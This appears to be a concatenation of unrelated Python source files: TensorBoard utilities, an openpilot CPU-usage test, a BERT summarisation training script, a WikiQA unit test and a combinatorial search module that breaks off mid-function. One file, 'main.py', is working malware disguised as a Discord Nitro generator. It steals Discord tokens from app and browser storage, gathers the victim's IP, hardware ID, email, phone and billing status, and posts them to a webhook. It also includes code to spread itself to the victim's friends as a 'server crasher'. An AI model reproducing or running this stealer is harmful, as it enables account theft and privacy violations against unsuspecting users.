require any valid runs.
"""
files = {}
if logdir is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/'):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
def reload_multiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _reload_forever():
while True:
reload_multiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_reload_forever)
thread.daemon = True
thread.start()
return thread
def get_tensorboard_tag():
"""Read the TensorBoard TAG number, and return it or an empty string."""
tag = resource_loader.load_resource('tensorboard/TAG').strip()
return tag
|
test_cpu_usage.py
|
#!/usr/bin/env python3
import time
import threading
import _thread
import signal
import sys
import cereal.messaging as messaging
from common.params import Params
import selfdrive.manager as manager
from selfdrive.test.helpers import set_params_enabled
def cputime_total(ct):
return ct.cpuUser + ct.cpuSystem + ct.cpuChildrenUser + ct.cpuChildrenSystem
def print_cpu_usage(first_proc, last_proc):
procs = [
("selfdrive.controls.controlsd", 59.46),
("selfdrive.locationd.locationd", 34.38),
("./loggerd", 33.90),
("selfdrive.controls.plannerd", 19.77),
("./_modeld", 12.74),
("selfdrive.locationd.paramsd", 11.53),
("selfdrive.controls.radard", 9.54),
("./_ui", 9.54),
("./camerad", 7.07),
("selfdrive.locationd.calibrationd", 6.81),
("./_sensord", 6.17),
("selfdrive.monitoring.dmonitoringd", 5.48),
("./boardd", 3.63),
("./_dmonitoringmodeld", 2.67),
("selfdrive.logmessaged", 2.71),
("selfdrive.thermald.thermald", 2.41),
("./proclogd", 1.54),
("./_gpsd", 0.09),
("./clocksd", 0.02),
("./ubloxd", 0.02),
("selfdrive.tombstoned", 0),
("./logcatd", 0),
]
r = 0
dt = (last_proc.logMonoTime - first_proc.logMonoTime) / 1e9
result = "------------------------------------------------\n"
for proc_name, normal_cpu_usage in procs:
try:
first = [p for p in first_proc.procLog.procs if proc_name in p.cmdline][0]
last = [p for p in last_proc.procLog.procs if proc_name in p.cmdline][0]
cpu_time = cputime_total(last) - cputime_total(first)
cpu_usage = cpu_time / dt * 100.
if cpu_usage > max(normal_cpu_usage * 1.1, normal_cpu_usage + 5.0):
result += f"Warning {proc_name} using more CPU than normal\n"
r = 1
elif cpu_usage < min(normal_cpu_usage * 0.3, max(normal_cpu_usage - 1.0, 0.0)):
result += f"Warning {proc_name} using less CPU than normal\n"
r = 1
result += f"{proc_name.ljust(35)} {cpu_usage:.2f}%\n"
except IndexError:
result += f"{proc_name.ljust(35)} NO METRICS FOUND\n"
r = 1
result += "------------------------------------------------\n"
print(result)
return r
def all_running():
running = manager.get_running()
return all(p in running and running[p].is_alive() for p in manager.car_started_processes)
return_code = 1
def test_thread():
try:
global return_code
proc_sock = messaging.sub_sock('procLog', conflate=True, timeout=2000)
# wait until everything's started and get first sample
start_time = time.monotonic()
while time.monotonic() - start_time < 120:
if Params().get("CarParams") is not None:
break
time.sleep(2)
first_proc = messaging.recv_sock(proc_sock, wait=True)
if first_proc is None or not all_running():
err_msg = "procLog recv timed out" if first_proc is None else "all car started process not running"
print(f"\n\nTEST FAILED: {err_msg}\n\n")
raise Exception
# run for a minute and get last sample
time.sleep(60)
last_proc = messaging.recv_sock(proc_sock, wait=True)
return_code = print_cpu_usage(first_proc, last_proc)
if not all_running():
return_code = 1
finally:
_thread.interrupt_main()
if __name__ == "__main__":
# setup signal handler to exit with test status
def handle_exit(sig, frame):
sys.exit(return_code)
signal.signal(signal.SIGINT, handle_exit)
# start manager and test thread
set_params_enabled()
Params().delete("CarParams")
t = threading.Thread(target=test_thread)
t.daemon = True
t.start()
manager.main()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_pretrained_bert import BertConfig
from argparse import ArgumentParser
import distributed
from .models import data_loader, model_builder
from .models.data_loader import load_dataset
from .models.model_builder import Summarizer
from .models.trainer import build_trainer
from .others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers','encoder','ff_actv', 'use_interval','rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter =data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
print('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter,step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = Summarizer(args, device, load_pretrained_bert=True)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
def get_arg_parser() -> ArgumentParser:
parser = argparse.ArgumentParser()
parser.add_argument("-encoder", default='classifier', type=str, choices=['classifier','transformer','rnn','baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test'])
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-bert_config_path", default='../bert_config_uncased_base.json')
parser.add_argument("-batch_size", default=1000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=512, type=int)
parser.add_argument("-heads", default=4, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='', type=str)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
return parser
if __name__ == '__main__':
parser = get_arg_parser()
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size > 1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test(args, device_id, cp, step)
|
main.py
|
import os
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
my_file = os.path.join(THIS_FOLDER, 'NitroGenerationCheck.txt')
file = open("NitroGenerationCheck.txt", "w")
file.write("")
file.close()
with open("NitroGenerationCheck.txt", "w") as file:
file.write("Nitro Generation = Unsuccesful. Maybe try again?")
from os import startfile
startfile( "NitroGenerationCheck.txt" )
#start getting token!
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info:**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info:**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token:**""**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"TokenGrabber v4 By DumbDannyLol",
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "TokenGrabber v4 By DumbDannyLol",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("Your Webhook URL here!", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
test_wikiqa_04_test.py
|
import sys
import tempfile
import unittest
sys.path.append("..")
WORK_DIR = "/tmp/wikiqa-tests"
class TestAll(unittest.TestCase):
def test_test(self):
import json
from src.wikiqa.wikiqa_test import wikiqa_test
shared_path = "/save/out/squad/basic-class/00/shared.json"
run_id = "00"
prepro_dir = WORK_DIR
prev_model_dir = WORK_DIR
sent_size_th = "10"
ques_size_th = "10"
num_epochs = "1"
num_steps = "1"
eval_period = "1"
save_period = "1"
device = "/cpu:0"
device_type = "gpu"
num_gpus = "1"
mlpipeline_metrics_path = tempfile.NamedTemporaryFile()
model_dir = tempfile.mkdtemp()
try:
from multiprocessing import Process
args = (
WORK_DIR,
prepro_dir,
prev_model_dir,
shared_path,
run_id,
sent_size_th,
ques_size_th,
num_epochs,
num_steps,
eval_period,
save_period,
device,
device_type,
num_gpus,
mlpipeline_metrics_path.name,
model_dir,
)
p = Process(target=wikiqa_test, args=args)
p.start()
p.join()
except SystemExit:
print("Finished successfully!")
with open(mlpipeline_metrics_path.name, "r") as f:
metrics = json.load(f)
self.assertIn("metrics", list(metrics.keys()))
self.assertEqual(2, len(list(metrics["metrics"])))
self.assertEqual("accuracy-score", metrics["metrics"][0]["name"])
self.assertEqual("loss", metrics["metrics"][1]["name"])
mlpipeline_metrics_path.close()
if __name__ == "__main__":
unittest.main()
|
sgsearch.py
|
import shlex, os, sys
import numpy as np
import math as mathf
import re
from multiprocessing import Process, Queue
from operator import itemgetter
nProc = 1 #processor数定義(モジュールの外から値を設定する)
final_result = 0.
max_value = []
max_position = []
class Candidate():
def __init__(self,idnum,indx,value,maxindx,maxvalue,prev_move1,prev_move2,depth):
self.idnum=idnum
self.indx=indx
self.value=value
self.maxindx=maxindx
self.maxvalue=maxvalue
self.prev_move1=prev_move1
self.prev_move2=prev_move2
self.depth=depth
def convertLists(tryindx, i,upperx,lowerx):
return ((upperx-lowerx)*float(tryindx+1)/(i+2) + lowerx)
def onebit_rev(in_array,j):
for k in range(0,len(in_array)):
if(k==j):
if (in_array[k]==0):
in_array[k]=1
else:
in_array[k]=0
return in_array
def move_mode(prev_move1,prev_move2):
x = np.empty(len(prev_move1),dtype=int)
for k in range(0,len(prev_move1)):
if(prev_move1[k]==0 and prev_move2[k]==0):
x[k]=0
elif(prev_move1[k]==0 and prev_move2[k]==1):
x[k]=1
elif(prev_move1[k]==1 and prev_move2[k]==0):
x[k]=0
else:
x[k]=1
return x
def distance(a,b):
i = 0
for k in range(0,len(a)):
if(a[k] != b[k]):
i = i+1
return i
def procJob2(func, cand, i, newN, upperx, lowerx, q):
result_label = []
for k in newN:
tryindx = cand.indx - cand.prev_move1 + onebit_rev(cand.prev_move1,k)
# print(onebit_rev(cand.prev_move1,k))
print(tryindx)
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,onebit_rev(cand.prev_move1,k)])
print(res)
q.put(result_label)
def calcMultiProc2(func, cand, i, N, upperx, lowerx):
listN = list(range(N))
newNs = getDistedList(listN, nProc)
processes = []; queues = []
for n in range(nProc):
newN = newNs[n]
q = Queue()
p = Process(target=procJob2, args=(func, cand, i, newN, upperx, lowerx, q))
processes.append(p)
queues.append(q)
p.start()
result_label = []
for n in range(nProc):
processes[n].join()
result = queues[n].get()
result_label += result
return [result_label, listN]
def onebitrev_search(func,Candidates,i,N,upperx,lowerx,Cands):
result_label = []
for cand in Candidates:
print(cand.idnum)
scoreup_param = 0
linear = cand.prev_move1.copy()
result_label.append([cand.value,cand.prev_move1])
[result_label, kList] = calcMultiProc2(func, cand, i, N, upperx, lowerx)
for n in range(len(result_label)):
if result_label[n][0] < cand.value:
k = kList[n]
scoreup_param = scoreup_param + 1
linear[k] = onebit_rev(cand.prev_move1,k)[k]
# for k in range (0,N):
# tryindx = cand.indx - cand.prev_move1 + onebit_rev(cand.prev_move1,k)
# print(onebit_rev(cand.prev_move1,k))
# print(tryindx)
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,onebit_rev(cand.prev_move1,k)])
# print(res)
# if res < cand.value:
# scoreup_param = scoreup_param + 1
# linear[k] = onebit_rev(cand.prev_move1,k)[k]
# print(linear)
if (scoreup_param > 1):
tryindx = cand.indx - cand.prev_move1 + linear
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
print(cand.prev_move1)
print(tryindx)
print(tryx)
print(res)
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx - cand.prev_move1 + result_label[0][1]
cand.value = result_label[0][0]
cand.prev_move2 = result_label[0][1]
cand.depth = i
cand.prev_move1 = result_label[0][1]
result_label.clear()
def getDistSize(value, n):
delta = int(value / n)
dVals = [delta for i in range(n)]
mod = value - (delta * n)
i = 0
while i < mod:
dVals[i] += 1
i += 1
return dVals
def getDistedList(dataList, n):
"""dataListを均等にn分割したリストを返す。"""
dVals = getDistSize(len(dataList), n)
distedList = []
st = 0
for n in dVals:
distedList.append(dataList[st:st+n])
st += n
return distedList
# 各processのjob
def procJob(n, func, cand, i, procLines, lowerx, upperx, q):
"""各processorが処理するjobの内容。"""
result = []
for move in procLines:
print(move)
tryindx = cand.indx + move
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
# print("proc:"+str(n), tryindx)
# print("proc:"+str(n), tryx)
print("proc:"+str(n), res)
result.append([res,move])
q.put(result)
# 並列処理
def calcMultiProc(func, cand, i, lines_numpy, lowerx, upperx):
"""nProc(processor数)毎に処理を分割して、並列処理させる。"""
#各process毎にlines_numpyを分配する
newLines = getDistedList(lines_numpy, nProc)
#並列処理
processes = []; queues = []
# 各process分jobを投入
for n in range(nProc):
procLines = newLines[n] #各processに渡すlines_numpy
q = Queue()
p = Process(target=procJob, args=(n, func, cand, i, procLines, lowerx, upperx, q))
processes.append(p)
queues.append(q)
p.start()
# 各process分の結果を取得
result_label = []
for n in range(nProc):
processes[n].join() #n番目のprocessが終了するまで待つ
result = queues[n].get() #n番目のprocessの結果を取得
result_label += result
return result_label
def comb_search(func,Candidates,i,lines_numpy,N,upperx,lowerx,Cands,pattern):
#--- comb_search(main) ---
result_label = []
for cand in Candidates:
print(cand.idnum)
result_label = calcMultiProc(func, cand, i, lines_numpy, lowerx, upperx)
# for move in lines_numpy: #risuto
# print(move)
# tryindx = cand.indx + move
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# print(tryindx)
# print(tryx)
# print(res)
# result_label.append([res,move])
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx + result_label[0][1]
cand.value = result_label[0][0]
cand.prev_move2 = cand.prev_move1
cand.depth = i+1
cand.prev_move1 = result_label[0][1]
if (i==1):
cand.maxindx = cand.indx
cand.maxvalue = cand.value
else:
if (cand.maxvalue > result_label[0][0]):
cand.maxindx = cand.indx
cand.max_value = cand.value
if(pattern !="all"):
if(i==1):
for j in range(1,Cands):
Candidates.append(Candidate(idnum=j,indx= result_label[j][1],prev_move1=result_label[j][1],value=result_label[j][0],prev_move2=result_label[j][1],depth=i+1,maxindx=result_label[0][1],maxvalue=result_label[0][0]))
onebitrev_search(func,Candidates,i,N,upperx,lowerx,Cands)
result_label.clear()
return
else:
onebitrev_search(func,Candidates,i,N,upperx,lowerx,Cands)
else:
if(i==1):
temp = cand.prev_move1
# temp_result_label = result_label.copy()
for j in range(1,Cands):
# for k in range(0,N):
# result_label.delete(onebit_rev(cand.prev_move1,j))
result_label = [e for e in result_label if distance(e[1],temp) > 1]
result_label.sort(key=itemgetter(0))
# temp = result_label[0][1]
Candidates.append(Candidate(idnum=j,indx= result_label[0][1],prev_move1=result_label[0][1],value=result_label[0][0],prev_move2=result_label[0][1],depth=i+1,maxindx=result_label[0][1],maxvalue=result_label[0][0]))
result_label.clear()
return
result_label.clear()
def procJob3(func, cand, i, newN, upperx, lowerx,linear ,q):
result_label = []
for k in newN:
tryindx = cand.indx + onebit_rev(linear,k)
# print(tryindx)
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
resArray = onebit_rev(linear,k)
result_label.append([res,resArray])
# print(res)
q.put(result_label)
def calcMultiProc3(func, cand, i, N, upperx, lowerx,linear):
listN = [j for j in range(N)]
newNs = getDistedList(listN, nProc)
processes = []; queues = []
for n in range(nProc):
newN = newNs[n]
q = Queue()
p = Process(target=procJob3, args=(func, cand, i, newN, upperx, lowerx,linear, q))
processes.append(p)
queues.append(q)
p.start()
result_label = []
for n in range(nProc):
processes[n].join()
result = queues[n].get()
result_label += result
return [result_label, listN]
def neib_serach(func,Candidates,i,N,upperx,lowerx):
result_label = []
for cand in Candidates:
print(cand.idnum)
scoreup_param = 0
linear = move_mode(cand.prev_move1,cand.prev_move2).copy()
tryindx = cand.indx + linear
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
# print(linear)
# print(tryindx)
# print(tryx)
# print(res)
[result_label, kList] = calcMultiProc3(func, cand, i, N, upperx, lowerx,linear)
for n in range(len(result_label)):
if result_label[n][0] < res:
k = kList[n]
